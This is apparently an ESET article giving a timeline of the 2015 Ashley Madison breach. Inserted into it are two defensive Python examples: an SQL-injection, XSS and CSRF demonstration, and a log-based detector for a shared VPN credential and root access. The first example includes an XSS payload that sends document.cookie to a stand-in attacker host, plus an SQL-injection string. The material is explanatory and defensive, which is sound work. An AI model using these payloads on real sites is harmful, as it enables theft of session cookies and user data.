Security of Ashley Madison breached sooner than you think

It is one of the biggest data breaches in recent times and one of the most far-reaching, the full implications of which are yet to be understood. In fact, as the story continues to unfold, the Ashley Madison attack could become one of the most notable instances of cybercrime in 2015.

Here is a timeline of key events documenting the severity and seriousness of this event, which is now subject to a major, ongoing, multi-partner investigation.

(Month unknown) 2012

In an internal email, Ashley Madison’s founding chief technology officer, Raja Bhatia, warned his colleagues that Ashley Madison and its parent company Avid Life Media (ALM) were at risk of being attacked (clearly not taking best practice on board).

He reportedly said that “security was an obvious afterthought”, adding that he himself had failed to give security the attention it evidently warranted. He continued:

“There will be an eventual security crisis amongst one of your [ALM’s] properties and the media will leap on it as they always do.

“What separates the companies that get skinned alive from those that quickly recover is how you handle the communication both publicly and even more importantly, to your users. Silence is the worst possible answer.”

November 2012

Emails leaked by the Impact Team following its major online data dump of member details in 2015 revealed that Mr Bhatia had discussed the idea of “hacking” into another website with Ashley Madison’s chief executive, Noel Biderman.

Mr Bhatia reportedly sent Mr Biderman an email explaining that he had identified a vulnerability on Nerve, an online magazine that specializes in discussing sex, relationships and culture.

When asked what the “security hole” meant and how he had found it, Mr Bhatia replied: “Was researching the casual dating space as it’s been on my mind. I remembered Nerve relaunched with a slick site and did a little digging into how it worked.

“They did a poor job of auditing their site. Have access to all their user records, including emails, encrypted password, if they purchased or not, who they talked to, what their search preferences are, last login [and] fraud risk profile.”

Interestingly, ALM had, prior to this exchange, been approached by Nerve to discuss the possibility of a partnership or investment opportunity.

In response to these revelations, ALM said in a statement to Motherboard that the communication between Mr Bhatia and Mr Biderman had been taken out of context.

It stated: “Noel contacted Raja Bhatia and asked for his assistance in conducting technical due diligence on the opportunity [of a partnership]. This activity, while clumsily conducted, uncovered certain technology shortcomings which Noel attempted to understand and confirm. At no point was there an effort made to hack, steal or use [Nerve]’s proprietary data.”

2013 – 2014

As far as can be ascertained, there were no reports of data breaches at Ashley Madison, nor were any concerns aired with regards to security vulnerabilities at the website during this time. However, there may well have been internal discussions or discoveries that have not been made public.

25th May, 2015

Again, the first half of 2015 seemed to be business as usual, with no indication of what was to come. Yet in May, Ashley Madison’s director of security, Mark Steele, contacted Mr Biderman to discuss matters of security, which appear to have been high on the agenda.

He explained: “Given our open registration policy and recent high profile exploits, every security consultant and their extended family will be trying to trump up business.

“Our codebase has many [riddled] XSS/CSRF vulnerabilities which are relatively easy to find [for a security researcher], and somewhat difficult to exploit in the wild [requires phishing]. Other vulnerabilities would be things like SQL injection/data leaks, which would be much more damaging.”
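The distinction Mr Steele draws is worth making concrete. XSS and CSRF need a victim to act (load a page, click a link), which is why he says they require phishing; a SQL injection in a lookup query hands the attacker the table directly, with no victim involved. The following is an added illustration written for this article, not code from ALM or Ashley Madison. It builds an in-memory SQLite table of constructed sample rows (the names and addresses are invented), shows the injectable query beside its parameterized form, shows an unescaped page fragment beside an escaped one, and shows a CSRF token comparison. The payloads, table layout and function names are all assumptions made for the example.

```python
"""Added example: why SQL injection is ranked above XSS/CSRF in the email quoted above.
All data below is constructed for this illustration; none of it is real user data."""
import hmac
import html
import secrets
import sqlite3

# Constructed sample rows (not real records).
SAMPLE_USERS = [
    ("alice", "alice@example.invalid", "scrypt$...a"),
    ("bob", "bob@example.invalid", "scrypt$...b"),
    ("carol", "carol@example.invalid", "scrypt$...c"),
]

# Payloads an attacker would submit. The SQLi string needs no victim; the XSS
# string only does harm once some other user's browser renders it.
PAYLOAD_SQLI = "x' OR '1'='1"
PAYLOAD_XSS = "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>"


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Vulnerable: attacker-controlled text is spliced into the SQL statement, so
    the WHERE clause can be rewritten to match every row (a direct data leak)."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Hardened: the value is bound as a parameter and can only ever be compared
    as data, never interpreted as SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_profile_vulnerable(display_name):
    """Vulnerable: stored XSS. The markup is emitted verbatim and runs in the
    browser of whoever views this profile, which is the phishing/lure step."""
    return "<p>Welcome, " + display_name + "</p>"


def render_profile_escaped(display_name):
    """Hardened: HTML-escape untrusted text before placing it in element content."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


def new_csrf_token():
    """Per-session random token stored server-side and echoed in each form."""
    return secrets.token_urlsafe(32)


def csrf_token_valid(session_token, submitted_token):
    """Constant-time comparison; a request forged from another origin cannot
    include the token, so it is rejected even though the victim's cookies were sent."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup returns", len(lookup_vulnerable(db, PAYLOAD_SQLI)), "rows")
    print("parameterized lookup returns", len(lookup_parameterized(db, PAYLOAD_SQLI)), "rows")
    print(render_profile_escaped(PAYLOAD_XSS))
    tok = new_csrf_token()
    print("forged request accepted:", csrf_token_valid(tok, ""))
```

Run against the constructed table, the injected lookup returns every row while the parameterized one returns nothing, which is the “much more damaging” case in the email: no phishing, no victim interaction, the whole table. The escaped renderer neutralises the script tag and the token check refuses a cross-site request that carries no token.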

12th July

ALM’s employees turned up to work, ready to start what they thought was another normal day. However, after logging into their respective computers, they were greeted with a disconcerting message from the Impact Team.

To the music of AC/DC – their hit Thunderstruck – the message read: “We are the Impact Team. We have taken over all systems in your entire office and production domains, all customer information databases, source code repositories, financial records [and] emails.

“Shutting down AM [Ashley Madison] and EM [Established Men] will cost you, but non-compliance will cost you more: We will release all customer records, profiles … and matching credit card details … Avid Life Media will be liable for fraud and extreme harm to millions of users.”

19th July

A week on from “first contact”, the Impact Team posted the same message on Pastebin, a website that allows anyone to store and share plain text for a limited period of time.

In this version, however, redacted details of two Ashley Madison members are revealed, a demonstration that the group is serious about its threat to go fully public with the data it has stolen.

The attackers then informed security journalist Brian Krebs of the breach, who broke the news to the rest of the world. He revealed that up to 37 million members of the site could be exposed within a month if the Impact Team’s demands were not met.

Before making an official statement the following day, Mr Biderman told Mr Krebs that the company was “working diligently and feverishly” to take down the leaked ALM intellectual property.

20th July

ALM announced that it had been subject to “an attempt by an unauthorized party to gain access to its systems”. It said that since making the discovery, it had been able to secure its website against further attacks.

It added: “We are working with law enforcement agencies, which are investigating this criminal act. Any and all parties responsible for this act of cyberterrorism will be held responsible.”

Responding to reports that its paid delete service did not remove all personal information as claimed, Ashley Madison stated that this was false. It reassured its users that a “hard-delete”, as it puts it, clears everything.

Given the unique circumstances of the case, it informed its members that the service would now be free, “as customers’ privacy is of the utmost concern”. However, one journalist documented her difficulty in using it.

22nd July

As details of the breach unfold and the story evolves into one of the most widely discussed and debated cybercrimes in recent years, the Impact Team releases the personal details of two men who had signed up to the service.

The information includes their names, their addresses and their sexual interests. This is considered to be the first “official” data leak and is seen as a strong sign of intent from the attackers.

18th August

One month on from the attack, it is evident that ALM is not going to bow to pressure from the Impact Team. In response to this, the group, true to their word, released the information on the dark web.

It states: “Time’s up! Avid Life Media have failed to take down Ashley Madison and Established Men. We have explained the fraud, deceit and stupidity of ALM and their members. Now everyone gets to see their data.

“Find yourself in here? It was ALM that failed you and lied to you. Prosecute them and claim damages. Then move on with your life. Learn your lesson and make your amends. Embarrassing now but you’ll get over it.”

The same day, the company released a statement reaffirming its commitment to countering the efforts of the Impact Team while continuing to run the Ashley Madison website. It stated that multiple law enforcement investigations were underway, suggesting that the matter is being dealt with in the most comprehensive way possible.

“This event is not an act of hacktivism, it is an act of criminality. It is an illegal action against the individual members of [Ashley Madison], as well as any freethinking people who choose to engage in fully lawful online activities,” it went on to say.

“The criminal, or criminals, involved in this act have appointed themselves as the moral judge, juror, and executioner, seeing fit to impose a personal notion of virtue on all of society. We will not sit idly by and allow these thieves to force their personal ideology on citizens around the world.”

20th August

Two days later, while everyone is still coming to terms with the implications of this data dump, the Impact Team released its second trove of data onto the web. This is larger than the original release – approximately 20 gigabytes compared to 10 gigabytes – and contains internal documents belonging to ALM, including emails belonging to Mr Biderman.

Addressing ALM’s chief executive directly, the Impact Team remarked: “Hey Noel, you can admit it’s real now.” This is seen as a retort to the fact that Mr Biderman had questioned the full validity of the first data dump.

21st August

In an exclusive interview with Motherboard – which was posted online not long after a third release of data – the Impact Team said that while they had “worked hard” to make the attack undetectable, once they were in, they “found nothing to bypass”.

The group claimed that security was “bad” and that “nobody was watching”. It added: “Only thing was segmented network. You could use Pass1234 from the internet to VPN to root on all servers.”

The group also alleges that it amassed over 300 gigabytes of internal documents and emails, collected over a number of years (a claim it had already made in its original message to ALM employees).

They also suggest that the Ashley Madison attack is just the beginning: “Any companies that make hundreds of millions profiting off pain of others, secrets, and lies. Maybe corrupt politicians. If we do, it will be a long time, but it will be total.”
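Two things in the Motherboard interview above are detectable in ordinary logs: a single VPN credential being used from many different internet addresses (the “Pass1234 from the internet” claim) and direct root logins on internal servers arriving from VPN-assigned addresses (the “root on all servers” claim). The script below is an added example written for this article, not tooling from ALM or from the investigation. The log format, the VPN address pool, the account names, the hostnames and every log line are constructed for the illustration; the source addresses are drawn from the reserved documentation ranges so they correspond to no real host.

```python
"""Added example: two detections for the weaknesses described in the interview above,
run over constructed log lines. The line format is an assumption for this example,
not any real VPN or SSH product's log layout."""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumed address pool handed to VPN clients once authenticated.
VPN_POOL = ip_network("10.8.0.0/24")

# Constructed sample log (not real data). 'svc_backup' is one shared service
# credential used from three different internet addresses, then used to log
# straight into root on several servers; 'jsmith' is a normal user.
SAMPLE_LOG = """\
2015-07-11T02:14:05Z vpn auth ok user=svc_backup src=203.0.113.7 assigned=10.8.0.21
2015-07-11T02:15:11Z ssh login ok user=root src=10.8.0.21 host=db01
2015-07-11T02:15:40Z ssh login ok user=root src=10.8.0.21 host=web01
2015-07-11T03:01:59Z vpn auth ok user=svc_backup src=198.51.100.23 assigned=10.8.0.22
2015-07-11T03:02:30Z ssh login ok user=root src=10.8.0.22 host=db02
2015-07-11T09:30:00Z vpn auth ok user=jsmith src=192.0.2.44 assigned=10.8.0.23
2015-07-11T09:31:00Z ssh login ok user=jsmith src=10.8.0.23 host=web01
2015-07-11T10:00:00Z vpn auth ok user=svc_backup src=203.0.113.99 assigned=10.8.0.24
"""

VPN_RE = re.compile(
    r"^(?P<ts>\S+) vpn auth ok user=(?P<user>\S+) src=(?P<src>\S+) assigned=(?P<assigned>\S+)$"
)
SSH_RE = re.compile(
    r"^(?P<ts>\S+) ssh login ok user=(?P<user>\S+) src=(?P<src>\S+) host=(?P<host>\S+)$"
)


def parse_events(text):
    """Split the log into VPN authentication events and SSH login events."""
    vpn, ssh = [], []
    for line in text.splitlines():
        m = VPN_RE.match(line)
        if m:
            vpn.append(m.groupdict())
            continue
        m = SSH_RE.match(line)
        if m:
            ssh.append(m.groupdict())
    return vpn, ssh


def shared_vpn_accounts(vpn_events, min_sources=3):
    """Accounts that authenticated to the VPN from at least min_sources distinct
    addresses outside the VPN pool: the signature of a credential that has been
    shared, guessed or leaked rather than tied to one person."""
    sources = defaultdict(set)
    for e in vpn_events:
        if ip_address(e["src"]) not in VPN_POOL:
            sources[e["user"]].add(e["src"])
    return {u: sorted(s) for u, s in sources.items() if len(s) >= min_sources}


def root_via_vpn(vpn_events, ssh_events):
    """For each VPN account, the hosts on which a direct root login was made from
    the address the VPN assigned to it. Any entry here is a finding: root should
    not be reachable straight off the VPN at all."""
    owner = {e["assigned"]: e["user"] for e in vpn_events}  # last assignment wins
    hosts = defaultdict(set)
    for e in ssh_events:
        if e["user"] == "root" and e["src"] in owner:
            hosts[owner[e["src"]]].add(e["host"])
    return {u: sorted(h) for u, h in hosts.items()}


if __name__ == "__main__":
    vpn, ssh = parse_events(SAMPLE_LOG)
    print("shared VPN credentials:", shared_vpn_accounts(vpn))
    print("root reached via VPN:", root_via_vpn(vpn, ssh))
```

On the constructed log this flags svc_backup on both counts while leaving jsmith alone. In production the first check would be evaluated over a sliding time window and the VPN-to-SSH correlation would need to honour lease times for the assigned addresses; the example keeps a single static mapping to stay short. The more important point is the one the attackers made: a segmented network does nothing if one password opens the VPN and root is reachable from it.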

24th August

It becomes clear that members may fall victim to extortion, with cybercriminals looking to exploit the Ashley Madison data breach for financial gain. Stephen Cobb, a senior security researcher at ESET, says that the risks faced by members are all too real:

“This illegal data dump represents a bonanza for scam artists of every stripe, from every corner of the world; we are going to see everything from phishing emails to blackmail attempts, against a range of different parties, not just people who signed up at the site.”

At a Toronto Police news conference, Superintendent Bryce Evans recounted the events of the past month to the media and the public and gave an update on the current situation.

Mr Evans said: “The ripple effect of the Impact Team’s actions has and will continue to have a long-term social and economic impact and they have already sparked spin-offs of crimes and further victimization. As of this morning we have two unconfirmed reports of suicides that are associated with the leak of Ashley Madison’s customer’s profiles.”

ALM is offering 500,000 Canadian dollars (about US$375,000) to anyone who provides the taskforce set up to deal with the case with information that leads to the “identification, arrest and conviction of the person or persons responsible for the theft of proprietary data”.

26th August

A potential breakthrough is made, with Mr Krebs detailing his own investigation into the perpetrators behind the Ashley Madison data breach. The security expert explains that his analysis of a “prolific Twitter user”, who goes by the name Thadeus Zu, suggests a link to the attack.

And, if not, Mr Krebs went on to say, “one thing is clear: If Zu wasn’t involved in the hack, he almost certainly knows who was.”

28th August

ALM announces that Mr Biderman, founder and chief executive of Ashley Madison, has stepped down and “is no longer with the company”. An official statement explains that this is in the “best interest” of all, adding that in the interim, the business will be led by the existing senior management team.

This article was updated on 28th August, 2015.

Author: ESET

Copyright © 2016 ESET, All Rights Reserved.